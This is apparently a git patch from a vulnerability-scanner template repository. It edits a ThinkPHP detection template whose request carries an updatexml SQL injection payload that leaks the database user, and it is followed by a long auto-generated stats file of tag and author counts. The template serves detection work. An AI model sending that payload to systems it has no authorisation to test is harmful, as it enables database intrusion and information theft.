b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index 7a7f272102..fe3e3f715e 100644 --- a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -12,13 +12,15 @@ requests: - method: GET path: - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" + matchers-condition: and matchers: - type: word + condition: and words: - "SQLSTATE" - "XPATH syntax error" - condition: and + - type: status status: - 500 From fe410f6de6fdc3a1e697cc1930f790f288e83a6d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 Sep 2021 13:05:52 +0000 Subject: [PATCH 2633/4083] Auto Generated Templates Stats [Thu Sep 30 13:05:52 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1563 +++++++++++++++++++++--------------------- TOP-10.md | 10 +- 3 files changed, 788 insertions(+), 787 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 78909cc77c..66bc89f97e 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":803},{"name":"lfi","count":325},{"name":"xss","count":253},{"name":"panel","count":252},{"name":"wordpress","count":241},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":188},{"name":"wp-plugin","count":167},{"name":"cve2020","count":164},{"name":"cve2021","count":139},{"name":"joomla","count":128},{"name":"cve2010","count":108},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"apache","count":70},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":64},{"name":"oob","count":57},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":43},{"name":"ssrf","count":40},{"name":"sqli","count":38},{"name":"","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"cve2015","count":26},{"name":"auth-bypass","count":23},{"name":"generic","count":23},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"router","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"debug","count":18},{"name":"cve2012","count":17},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"cve2009","count":14},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"aws","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"intrusive","count":9},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"nginx","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"cms","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"backup","count":7},{"name":"microsoft","count":7},{"name":"ibm","count":7},{"name":"confluence","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"google","count":7},{"name":"solr","count":6},{"name":"citrix","count":6},{"name":"hp","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"rconfig","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"dedecms","count":5},{"name":"headless","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"fileupload","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"tomcat","count":5},{"name":"deserialization","count":5},{"name":"nodejs","count":5},{"name":"iis","count":5},{"name":"drupal","count":5},{"name":"jolokia","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"wso2","count":4},{"name":"zimbra","count":4},{"name":"asp","count":4},{"name":"zabbix","count":4},{"name":"firmware","count":4},{"name":"resin","count":4},{"name":"artifactory","count":4},{"name":"grafana","count":4},{"name":"traversal","count":4},{"name":"strapi","count":4},{"name":"webserver","count":4},{"name":"symantec","count":4},{"name":"proxy","count":4},{"name":"thinkphp","count":4},{"name":"symfony","count":4},{"name":"hongdian","count":4},{"name":"solarwinds","count":4},{"name":"thinkcmf","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"exchange","count":4},{"name":"glpi","count":4},{"name":"buffalo","count":4},{"name":"samsung","count":4},{"name":"elastic","count":4},{"name":"crlf","count":4},{"name":"moodle","count":4},{"name":"rfi","count":4},{"name":"git","count":4},{"name":"log","count":3},{"name":"springcloud","count":3},{"name":"mail","count":3},{"name":"jellyfin","count":3},{"name":"fanruan","count":3},{"name":"nosqli","count":3},{"name":"openssh","count":3},{"name":"httpd","count":3},{"name":"smtp","count":3},{"name":"fpd","count":3},{"name":"tikiwiki","count":3},{"name":"linkerd","count":3},{"name":"bigip","count":3},{"name":"bitrix","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"opensis","count":3},{"name":"backdoor","count":3},{"name":"zhiyuan","count":3},{"name":"ssh","count":3},{"name":"hoteldruid","count":3},{"name":"backups","count":3},{"name":"slack","count":3},{"name":"druid","count":3},{"name":"kevinlab","count":3},{"name":"mongodb","count":3},{"name":"cacti","count":3},{"name":"nexus","count":3},{"name":"fatpipe","count":3},{"name":"telerik","count":3},{"name":"itop","count":3},{"name":"prometheus","count":3},{"name":"ebs","count":3},{"name":"lfr","count":3},{"name":"npm","count":3},{"name":"cve2007","count":3},{"name":"oa","count":3},{"name":"r-seenet","count":3},{"name":"jeesns","count":3},{"name":"vbulletin","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"targa","count":3},{"name":"amazon","count":3},{"name":"openam","count":3},{"name":"azure","count":3},{"name":"injection","count":3},{"name":"firebase","count":3},{"name":"ofbiz","count":3},{"name":"terramaster","count":3},{"name":"kibana","count":3},{"name":"frp","count":2},{"name":"rstudio","count":2},{"name":"chamilo","count":2},{"name":"sonicwall","count":2},{"name":"service","count":2},{"name":"cve2005","count":2},{"name":"phpcollab","count":2},{"name":"tidb","count":2},{"name":"payara","count":2},{"name":"linux","count":2},{"name":"kentico","count":2},{"name":"akkadian","count":2},{"name":"smb","count":2},{"name":"hasura","count":2},{"name":"paloalto","count":2},{"name":"splunk","count":2},{"name":"mcafee","count":2},{"name":"natshell","count":2},{"name":"hashicorp","count":2},{"name":"webcam","count":2},{"name":"xxljob","count":2},{"name":"waf","count":2},{"name":"pega","count":2},{"name":"jeedom","count":2},{"name":"getsimple","count":2},{"name":"minio","count":2},{"name":"aviatrix","count":2},{"name":"hpe","count":2},{"name":"flir","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"trixbox","count":2},{"name":"emerge","count":2},{"name":"qcubed","count":2},{"name":"akamai","count":2},{"name":"saltstack","count":2},{"name":"axis","count":2},{"name":"netis","count":2},{"name":"ecoa","count":2},{"name":"enumeration","count":2},{"name":"bucket","count":2},{"name":"sitecore","count":2},{"name":"nagios","count":2},{"name":"activemq","count":2},{"name":"hostheader-injection","count":2},{"name":"bypass","count":2},{"name":"avantfax","count":2},{"name":"icewarp","count":2},{"name":"ec2","count":2},{"name":"maian","count":2},{"name":"sharepoint","count":2},{"name":"horde","count":2},{"name":"glassfish","count":2},{"name":"huawei","count":2},{"name":"oauth","count":2},{"name":"commax","count":2},{"name":"leak","count":2},{"name":"axis2","count":2},{"name":"showdoc","count":2},{"name":"dos","count":2},{"name":"sonarqube","count":2},{"name":"storage","count":2},{"name":"adminer","count":2},{"name":"openfire","count":2},{"name":"netsweeper","count":2},{"name":"cache","count":2},{"name":"idrac","count":2},{"name":"chiyu","count":2},{"name":"igs","count":2},{"name":"mida","count":2},{"name":"liferay","count":2},{"name":"rockmongo","count":2},{"name":"vcenter","count":2},{"name":"github","count":2},{"name":"harbor","count":2},{"name":"jsf","count":2},{"name":"middleware","count":2},{"name":"yii","count":2},{"name":"aruba","count":2},{"name":"wordfence","count":2},{"name":"guacamole","count":2},{"name":"nextjs","count":2},{"name":"totemomail","count":2},{"name":"seeyon","count":2},{"name":"grav","count":2},{"name":"status","count":2},{"name":"plesk","count":2},{"name":"dolibarr","count":2},{"name":"geowebserver","count":2},{"name":"prestashop","count":2},{"name":"openvpn","count":2},{"name":"odoo","count":2},{"name":"wuzhicms","count":2},{"name":"kong","count":2},{"name":"globalprotect","count":2},{"name":"jboss","count":2},{"name":"keycloak","count":2},{"name":"favicon","count":2},{"name":"nextcloud","count":2},{"name":"couchdb","count":2},{"name":"chyrp","count":2},{"name":"yapi","count":2},{"name":"spark","count":2},{"name":"fortios","count":2},{"name":"ucmdb","count":2},{"name":"voipmonitor","count":2},{"name":"shellshock","count":2},{"name":"prtg","count":2},{"name":"ecology","count":2},{"name":"db","count":2},{"name":"ilo","count":2},{"name":"node","count":2},{"name":"bruteforce","count":2},{"name":"sar2html","count":1},{"name":"actuator","count":1},{"name":"zms","count":1},{"name":"whm","count":1},{"name":"alerta","count":1},{"name":"razor","count":1},{"name":"motorola","count":1},{"name":"rdp","count":1},{"name":"plone","count":1},{"name":"netmask","count":1},{"name":"monitorr","count":1},{"name":"pulsesecure","count":1},{"name":"emc","count":1},{"name":"gitea","count":1},{"name":"shoretel","count":1},{"name":"anchorcms","count":1},{"name":"drone","count":1},{"name":"fortigate","count":1},{"name":"basic-auth","count":1},{"name":"sage","count":1},{"name":"openrestry","count":1},{"name":"gilacms","count":1},{"name":"rabbitmq","count":1},{"name":"karel","count":1},{"name":"appweb","count":1},{"name":"krweb","count":1},{"name":"h3c-imc","count":1},{"name":"sarg","count":1},{"name":"pyramid","count":1},{"name":"zarafa","count":1},{"name":"javamelody","count":1},{"name":"qvisdvr","count":1},{"name":"chevereto","count":1},{"name":"gunicorn","count":1},{"name":"couchbase","count":1},{"name":"finereport","count":1},{"name":"vscode","count":1},{"name":"iceflow","count":1},{"name":"bullwark","count":1},{"name":"k8","count":1},{"name":"pagespeed","count":1},{"name":"werkzeug","count":1},{"name":"ns","count":1},{"name":"keenetic","count":1},{"name":"rmc","count":1},{"name":"achecker","count":1},{"name":"gateone","count":1},{"name":"powercreator","count":1},{"name":"selea","count":1},{"name":"tamronos","count":1},{"name":"blackboard","count":1},{"name":"oidc","count":1},{"name":"websphere","count":1},{"name":"labtech","count":1},{"name":"saltapi","count":1},{"name":"exposures","count":1},{"name":"memcached","count":1},{"name":"rsyncd","count":1},{"name":"database","count":1},{"name":"ewebs","count":1},{"name":"timeclock","count":1},{"name":"owa","count":1},{"name":"thinkadmin","count":1},{"name":"emby","count":1},{"name":"flink","count":1},{"name":"rocketchat","count":1},{"name":"alertmanager","count":1},{"name":"asus","count":1},{"name":"exponentcms","count":1},{"name":"graylog","count":1},{"name":"gstorage","count":1},{"name":"nedi","count":1},{"name":"phpunit","count":1},{"name":"perl","count":1},{"name":"optiLink","count":1},{"name":"szhe","count":1},{"name":"fastcgi","count":1},{"name":"cherokee","count":1},{"name":"adb","count":1},{"name":"kerbynet","count":1},{"name":"fortiweb","count":1},{"name":"panasonic","count":1},{"name":"woocomernce","count":1},{"name":"opentsdb","count":1},{"name":"cve2006","count":1},{"name":"websvn","count":1},{"name":"nuuo","count":1},{"name":"lotus","count":1},{"name":"lanproxy","count":1},{"name":"74cms","count":1},{"name":"dvwa","count":1},{"name":"phpinfo","count":1},{"name":"fortigates","count":1},{"name":"webmin","count":1},{"name":"viewpoint","count":1},{"name":"doh","count":1},{"name":"mobileiron","count":1},{"name":"olivetti","count":1},{"name":"episerver","count":1},{"name":"javascript","count":1},{"name":"zyxel","count":1},{"name":"xunchi","count":1},{"name":"mysql","count":1},{"name":"extractor","count":1},{"name":"huijietong","count":1},{"name":"cgi","count":1},{"name":"ognl","count":1},{"name":"lotuscms","count":1},{"name":"uwsgi","count":1},{"name":"gurock","count":1},{"name":"scimono","count":1},{"name":"zte","count":1},{"name":"jaspersoft","count":1},{"name":"nomad","count":1},{"name":"ioncube","count":1},{"name":"ueditor","count":1},{"name":"bazarr","count":1},{"name":"landrayoa","count":1},{"name":"sentry","count":1},{"name":"plc","count":1},{"name":"etherpad","count":1},{"name":"totaljs","count":1},{"name":"webmodule-ee","count":1},{"name":"zenario","count":1},{"name":"sgp","count":1},{"name":"varnish","count":1},{"name":"gloo","count":1},{"name":"yachtcontrol","count":1},{"name":"jsp","count":1},{"name":"faraday","count":1},{"name":"metinfo","count":1},{"name":"sidekiq","count":1},{"name":"zm","count":1},{"name":"burp","count":1},{"name":"goahead","count":1},{"name":"salesforce","count":1},{"name":"robomongo","count":1},{"name":"dnssec","count":1},{"name":"checkpoint","count":1},{"name":"livezilla","count":1},{"name":"maxsite","count":1},{"name":"azkaban","count":1},{"name":" default-login","count":1},{"name":"influxdb","count":1},{"name":"csrf","count":1},{"name":"clusterengine","count":1},{"name":"redcap","count":1},{"name":"nimble","count":1},{"name":"shopizer","count":1},{"name":"spidercontrol","count":1},{"name":"pihole","count":1},{"name":"graphql","count":1},{"name":"elascticsearch","count":1},{"name":"camunda","count":1},{"name":"webadmin","count":1},{"name":"email","count":1},{"name":"dotclear","count":1},{"name":"phpfastcache","count":1},{"name":"bigbluebutton","count":1},{"name":"spectracom","count":1},{"name":"discourse","count":1},{"name":"resourcespace","count":1},{"name":"traefik","count":1},{"name":"rhymix","count":1},{"name":"kubeflow","count":1},{"name":"visualtools","count":1},{"name":"kindeditor","count":1},{"name":"okta","count":1},{"name":"panos","count":1},{"name":"tensorflow","count":1},{"name":"opencast","count":1},{"name":"bolt","count":1},{"name":"avalanche","count":1},{"name":"luftguitar","count":1},{"name":"centreon","count":1},{"name":"bash","count":1},{"name":"openx","count":1},{"name":"zend","count":1},{"name":"tileserver","count":1},{"name":"subrion","count":1},{"name":"myucms","count":1},{"name":"nps","count":1},{"name":"clockwork","count":1},{"name":"javafaces","count":1},{"name":"cse","count":1},{"name":"argussurveillance","count":1},{"name":"tenda","count":1},{"name":"blue-ocean","count":1},{"name":"zookeeper","count":1},{"name":"cors","count":1},{"name":"glowroot","count":1},{"name":"zzzcms","count":1},{"name":"portainer","count":1},{"name":"sql","count":1},{"name":"smartsense","count":1},{"name":"svn","count":1},{"name":"frontpage","count":1},{"name":"xmlchart","count":1},{"name":"mirai","count":1},{"name":"blind","count":1},{"name":"k8s","count":1},{"name":"testrail","count":1},{"name":"jmx","count":1},{"name":"xvr","count":1},{"name":"opm","count":1},{"name":"darkstat","count":1},{"name":"weiphp","count":1},{"name":"postmessage","count":1},{"name":"owasp","count":1},{"name":"b2evolution","count":1},{"name":"dotnetnuke","count":1},{"name":"beanstalk","count":1},{"name":"phalcon","count":1},{"name":"domxss","count":1},{"name":"pcoip","count":1},{"name":"mantis","count":1},{"name":"omi","count":1},{"name":"qsan","count":1},{"name":"etouch","count":1},{"name":"rmi","count":1},{"name":"artica","count":1},{"name":"fortinet","count":1},{"name":"commscope","count":1},{"name":"dbeaver","count":1},{"name":"turbocrm","count":1},{"name":"sourcebans","count":1},{"name":"eyelock","count":1},{"name":"minimouse","count":1},{"name":"dotnet","count":1},{"name":"moinmoin","count":1},{"name":"craftcms","count":1},{"name":"oneblog","count":1},{"name":"aspnuke","count":1},{"name":"froxlor","count":1},{"name":"cocoon","count":1},{"name":"geddy","count":1},{"name":"ssltls","count":1},{"name":"openstack","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"tapestry","count":1},{"name":"apos","count":1},{"name":"codeigniter","count":1},{"name":"aura","count":1},{"name":"octobercms","count":1},{"name":"kafdrop","count":1},{"name":"solarlog","count":1},{"name":"woocommerce","count":1},{"name":"eprints","count":1},{"name":"erp-nc","count":1},{"name":"rujjie","count":1},{"name":"gespage","count":1},{"name":"mariadb","count":1},{"name":"linksys","count":1},{"name":"circontrol","count":1},{"name":"timesheet","count":1},{"name":"alibaba","count":1},{"name":"xampp","count":1},{"name":"tika","count":1},{"name":"upnp","count":1},{"name":"cloudinary","count":1},{"name":"ganglia","count":1},{"name":"glances","count":1},{"name":"biometrics","count":1},{"name":"seacms","count":1},{"name":"terraform","count":1},{"name":"spip","count":1},{"name":"announcekit","count":1},{"name":"nordex","count":1},{"name":"simplecrm","count":1},{"name":"xiuno","count":1},{"name":"sceditor","count":1},{"name":"eg","count":1},{"name":"st","count":1},{"name":"jenzabar","count":1},{"name":"wazuh","count":1},{"name":"sureline","count":1},{"name":"tensorboard","count":1},{"name":"gridx","count":1},{"name":"klog","count":1},{"name":"fuelcms","count":1},{"name":"mediumish","count":1},{"name":"lighttpd","count":1},{"name":"qdpm","count":1},{"name":"scs","count":1},{"name":"expn","count":1},{"name":"acexy","count":1},{"name":"sangfor","count":1},{"name":"plugin","count":1},{"name":"wifisky","count":1},{"name":"tectuus","count":1},{"name":"ruby","count":1},{"name":"ruckus","count":1},{"name":"clockwatch","count":1},{"name":"octoprint","count":1},{"name":"netdata","count":1},{"name":"monitorix","count":1},{"name":"pgadmin","count":1},{"name":"clave","count":1},{"name":"elfinder","count":1},{"name":"upload","count":1},{"name":"gsoap","count":1},{"name":"vnc","count":1},{"name":"diris","count":1},{"name":"chinaunicom","count":1},{"name":"mautic","count":1},{"name":"redhat","count":1},{"name":"tjws","count":1},{"name":"redwood","count":1},{"name":"ghost","count":1},{"name":"panabit","count":1},{"name":"esmtp","count":1},{"name":"zmanda","count":1},{"name":"vsphere","count":1},{"name":"clink-office","count":1},{"name":"skywalking","count":1},{"name":"feifeicms","count":1},{"name":"xdcms","count":1},{"name":"ambari","count":1},{"name":"phpwiki","count":1},{"name":"socomec","count":1},{"name":"novnc","count":1},{"name":"lg-nas","count":1},{"name":"redis","count":1},{"name":"haproxy","count":1},{"name":"logontracer","count":1},{"name":"cockpit","count":1},{"name":"pippoint","count":1},{"name":"shiro","count":1},{"name":"servicenow","count":1},{"name":"elasticsearch","count":1},{"name":"soar","count":1},{"name":"tpshop","count":1},{"name":"tracer","count":1},{"name":"addpac","count":1},{"name":"accela","count":1},{"name":"linkedin","count":1},{"name":"nc2","count":1},{"name":"landray","count":1},{"name":"shopxo","count":1},{"name":"ilo4","count":1},{"name":"trane","count":1},{"name":"nette","count":1},{"name":"jeewms","count":1},{"name":"parentlink","count":1},{"name":"vidyo","count":1},{"name":"postgres","count":1},{"name":"crm","count":1},{"name":"webftp","count":1},{"name":"svnserve","count":1},{"name":"spf","count":1},{"name":"ems","count":1},{"name":"miscrsoft","count":1},{"name":"iptime","count":1},{"name":"springframework","count":1},{"name":"node-red-dashboard","count":1},{"name":"wmt","count":1},{"name":"mongo","count":1},{"name":"apiman","count":1},{"name":"swagger","count":1},{"name":"gogs","count":1},{"name":"hiboss","count":1},{"name":"mailchimp","count":1},{"name":"vsftpd","count":1},{"name":"maccmsv10","count":1},{"name":"avtech","count":1},{"name":"opensmtpd","count":1},{"name":"metabase","count":1},{"name":"dompdf","count":1},{"name":"shoppable","count":1},{"name":"office365","count":1},{"name":"wildfly","count":1},{"name":"beanshell","count":1},{"name":"jenkin","count":1},{"name":"gitlist","count":1},{"name":"sprintful","count":1},{"name":"dom","count":1},{"name":"listserv","count":1},{"name":"nuxeo","count":1},{"name":"jfrog","count":1},{"name":"ulterius","count":1},{"name":"duomicms","count":1},{"name":"acme","count":1},{"name":"pmb","count":1},{"name":"dvr","count":1},{"name":"smi","count":1},{"name":"redmine","count":1},{"name":"synnefo","count":1},{"name":"circontrorl","count":1},{"name":"cloudron","count":1},{"name":"primetek","count":1},{"name":"wamp","count":1},{"name":"ricoh","count":1},{"name":"hiawatha","count":1},{"name":"triconsole","count":1},{"name":"geutebruck","count":1},{"name":"realteo","count":1},{"name":"smartblog","count":1},{"name":"fedora","count":1},{"name":"cerebro","count":1},{"name":"shopware","count":1},{"name":"cloudflare","count":1},{"name":"bookstack","count":1},{"name":"cscart","count":1},{"name":"openemr","count":1},{"name":"xml","count":1},{"name":"zeroshell","count":1},{"name":"embedthis","count":1},{"name":"expressjs","count":1},{"name":"yealink","count":1},{"name":"solman","count":1},{"name":"myvuehelp","count":1},{"name":"nweb2fax","count":1},{"name":"rubedo","count":1},{"name":"spring","count":1},{"name":"cyberoam","count":1},{"name":"wooyun","count":1},{"name":"visionhub","count":1},{"name":"starttls","count":1},{"name":"sqlite","count":1},{"name":"phpfusion","count":1},{"name":"pacsone","count":1},{"name":"floc","count":1},{"name":"auth","count":1},{"name":"gotmls","count":1},{"name":"wiki","count":1},{"name":"codemeter","count":1},{"name":"sophos","count":1},{"name":"imap","count":1},{"name":"trilithic","count":1},{"name":"stem","count":1},{"name":"lutron","count":1},{"name":"nsasg","count":1},{"name":"lancom","count":1},{"name":"fastapi","count":1},{"name":"rockethchat","count":1},{"name":"mantisbt","count":1},{"name":"mongoshake","count":1},{"name":"ecom","count":1},{"name":"api-manager","count":1},{"name":"nifi","count":1},{"name":"tieline","count":1},{"name":"lansweeper","count":1},{"name":"cofax","count":1},{"name":"mdb","count":1},{"name":"csod","count":1},{"name":"eyou","count":1},{"name":"plastic","count":1},{"name":"mara","count":1},{"name":"s3","count":1},{"name":"grails","count":1},{"name":"acontent","count":1},{"name":"processmaker","count":1},{"name":"cobub","count":1},{"name":"calendarix","count":1},{"name":"hadoop","count":1},{"name":"tongda","count":1},{"name":"zcms","count":1},{"name":"exacqvision","count":1},{"name":"idemia","count":1},{"name":"default","count":1},{"name":"interlib","count":1},{"name":"opensns","count":1},{"name":"wavlink","count":1},{"name":"discord","count":1},{"name":"fortilogger","count":1},{"name":"meraki","count":1},{"name":"twitter-server","count":1},{"name":"mrtg","count":1},{"name":"daybyday","count":1},{"name":"expose","count":1},{"name":"jquery","count":1},{"name":"tor","count":1},{"name":"servicedesk","count":1},{"name":"ntopng","count":1},{"name":"phpshowtime","count":1},{"name":"oscommerce","count":1},{"name":"heroku","count":1},{"name":"magicflow","count":1},{"name":"openerp","count":1},{"name":"webui","count":1},{"name":"bedita","count":1},{"name":"mpsec","count":1},{"name":"bitly","count":1},{"name":"viewlinc","count":1},{"name":"concrete","count":1},{"name":"proftpd","count":1},{"name":"clickhouse","count":1},{"name":"wavemaker","count":1},{"name":"sco","count":1},{"name":"jnoj","count":1},{"name":"natemail","count":1},{"name":"arl","count":1},{"name":"netrc","count":1},{"name":"tcexam","count":1},{"name":"kyan","count":1},{"name":"wondercms","count":1},{"name":"empirecms","count":1},{"name":"wing-ftp","count":1},{"name":"graphite","count":1},{"name":"moin","count":1},{"name":"fiori","count":1},{"name":"setup","count":1},{"name":"jitsi","count":1},{"name":"htmli","count":1},{"name":"centos","count":1},{"name":"hortonworks","count":1},{"name":"majordomo2","count":1},{"name":"ssl","count":1},{"name":"netgenie","count":1}],"authors":[{"name":"daffainfo","count":280},{"name":"pikpikcu","count":276},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":199},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":77},{"name":"pussycat0x","count":70},{"name":"princechaddha","count":62},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"meme-lord","count":7},{"name":"randomstr1ng","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"lu4nx","count":5},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"f1tz","count":3},{"name":"skeltavik","count":3},{"name":"idealphase","count":3},{"name":"impramodsargar","count":3},{"name":"fyoorer","count":3},{"name":"thomas_from_offensity","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"vsh00t","count":3},{"name":"sushantkamble","count":3},{"name":"johnk3r","count":3},{"name":"jarijaas","count":3},{"name":"unstabl3","count":3},{"name":"emenalf","count":3},{"name":"_generic_human_","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"incogbyte","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"dudez","count":3},{"name":"0w4ys","count":3},{"name":"parth","count":2},{"name":"foulenzer","count":2},{"name":"manas_harsh","count":2},{"name":"nkxxkn","count":2},{"name":"joeldeleep","count":2},{"name":"bp0lr","count":2},{"name":"zomsop82","count":2},{"name":"huowuzhao","count":2},{"name":"udit_thakkur","count":2},{"name":"ree4pwn","count":2},{"name":"bing0o","count":2},{"name":"whoever","count":2},{"name":"0xprial","count":2},{"name":"0xrudra","count":2},{"name":"alifathi-h1","count":2},{"name":"random-robbie","count":2},{"name":"hahwul","count":2},{"name":"0xsmiley","count":2},{"name":"johnjhacking","count":2},{"name":"w4cky_","count":2},{"name":"0xcrypto","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bsysop","count":2},{"name":"koti2","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"mohammedsaneem","count":2},{"name":"fabaff","count":2},{"name":"kiblyn11","count":2},{"name":"swissky","count":2},{"name":"arcc","count":2},{"name":"amsda","count":2},{"name":"pxmme1337","count":2},{"name":"afaq","count":2},{"name":"r3naissance","count":2},{"name":"socketz","count":2},{"name":"0xelkomy","count":2},{"name":"x1m_martijn","count":2},{"name":"cocxanh","count":2},{"name":"ehsahil","count":2},{"name":"convisoappsec","count":2},{"name":"g4l1t0","count":2},{"name":"gal nagli","count":2},{"name":"davidmckennirey","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"bernardofsr","count":2},{"name":"randomrobbie","count":2},{"name":"gevakun","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xsapra","count":2},{"name":"mubassirpatel","count":1},{"name":"vzamanillo","count":1},{"name":"sickwell","count":1},{"name":"bjhulst","count":1},{"name":"exploitation","count":1},{"name":"divya_mudgal","count":1},{"name":"udyz","count":1},{"name":"blckraven","count":1},{"name":"streetofhackerr007","count":1},{"name":"tirtha_mandal","count":1},{"name":"daviey","count":1},{"name":"flag007","count":1},{"name":"defr0ggy","count":1},{"name":"borna nematzadeh","count":1},{"name":"shifacyclewla","count":1},{"name":"zhenwarx","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"berkdusunur","count":1},{"name":"undefl0w","count":1},{"name":"notsoevilweasel","count":1},{"name":"manuelbua","count":1},{"name":"luci","count":1},{"name":"patralos","count":1},{"name":"omarkurt","count":1},{"name":"@dwisiswant0","count":1},{"name":"elouhi","count":1},{"name":"c3l3si4n","count":1},{"name":"andysvints","count":1},{"name":"yashgoti","count":1},{"name":"oscarintherocks","count":1},{"name":"geraldino2","count":1},{"name":"ringo","count":1},{"name":"makyotox","count":1},{"name":"alex","count":1},{"name":"thevillagehacker","count":1},{"name":"0xtavian","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"jeya seelan","count":1},{"name":"revblock","count":1},{"name":"sec_hawk","count":1},{"name":"toufik airane","count":1},{"name":"yavolo","count":1},{"name":"affix","count":1},{"name":"dawid-czarnecki","count":1},{"name":"_harleo","count":1},{"name":"brabbit10","count":1},{"name":"jteles","count":1},{"name":"me9187","count":1},{"name":"yashanand155","count":1},{"name":"th3.d1p4k","count":1},{"name":"intx0x80","count":1},{"name":"regala_","count":1},{"name":"xstp","count":1},{"name":"apt-mirror","count":1},{"name":"b0yd","count":1},{"name":"cookiehanhoan","count":1},{"name":"deena","count":1},{"name":"b0rn2r00t","count":1},{"name":"j33n1k4","count":1},{"name":"furkansenan","count":1},{"name":"tim_koopmans","count":1},{"name":"its0x08","count":1},{"name":"pratik khalane","count":1},{"name":"_darrenmartyn","count":1},{"name":"soyelmago","count":1},{"name":"adrianmf","count":1},{"name":"elder tao","count":1},{"name":"rodnt","count":1},{"name":"ipanda","count":1},{"name":"sy3omda","count":1},{"name":"sicksec","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"micha3lb3n","count":1},{"name":"infosecsanyam","count":1},{"name":"kre80r","count":1},{"name":"mhdsamx","count":1},{"name":"knassar702","count":1},{"name":"0xrod","count":1},{"name":"elmahdi","count":1},{"name":"gboddin","count":1},{"name":"fmunozs","count":1},{"name":"petruknisme","count":1},{"name":"retr0","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo 